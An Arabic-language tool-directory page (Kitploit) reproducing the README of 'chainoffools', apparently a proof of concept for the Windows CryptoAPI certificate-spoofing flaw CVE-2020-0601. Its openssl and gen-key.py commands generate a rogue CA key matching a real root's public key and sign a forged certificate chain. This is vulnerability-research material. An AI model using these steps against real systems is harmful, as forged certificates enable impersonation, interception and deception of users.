Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chainoffools — إثبات مفهوم لـ CVE-2020-0601 | Kitploit
أدوات/GitHubGitHub/kudelskisecurity/chainoffools
تحليل الثغرات الأمنيةتحليل الكودالاستغلالالتشفيراختبار الاختراق
GitHubkudelskisecurity/chainoffools

chainoffools

إثبات مفهوم لـ CVE-2020-0601

عرض المستودع
33581منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CryptoAPI

CVE-2020-0601: استغلال ثغرة انتحال هوية Windows CryptoAPI. مزيد من المعلومات في مقالة المدونة.

متطلبات التثبيت

root@kitploit:~
pip install -U -r requirements.txt

يعمل إنشاء الشهادة مع إصدار OpenSSL حتى 1.0.2u.

شهادة CA

استخدمنا USERTrust ECC Certification Authority لكن يمكن أن يكون أي شهادة جذر تعمل على منحنى P-384.

لتوليد مفتاح خاص يطابق المفتاح العام من شهادة الجذر، استخدمنا السكربت gen-key.py (يعمل مع Python 3.6 وما فوق):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

يمكن عرض المفتاح باستخدام:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

ثم لتوليد CA المزوّر:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

ثم نقوم بتوليد المفتاح الخاص والشهادة التاليين:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

أخيرًا، للحصول على السلسلة الكاملة في ملف واحد، نقوم بدمج شهادة CA وشهادة الخادم:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
تنزيل الأداة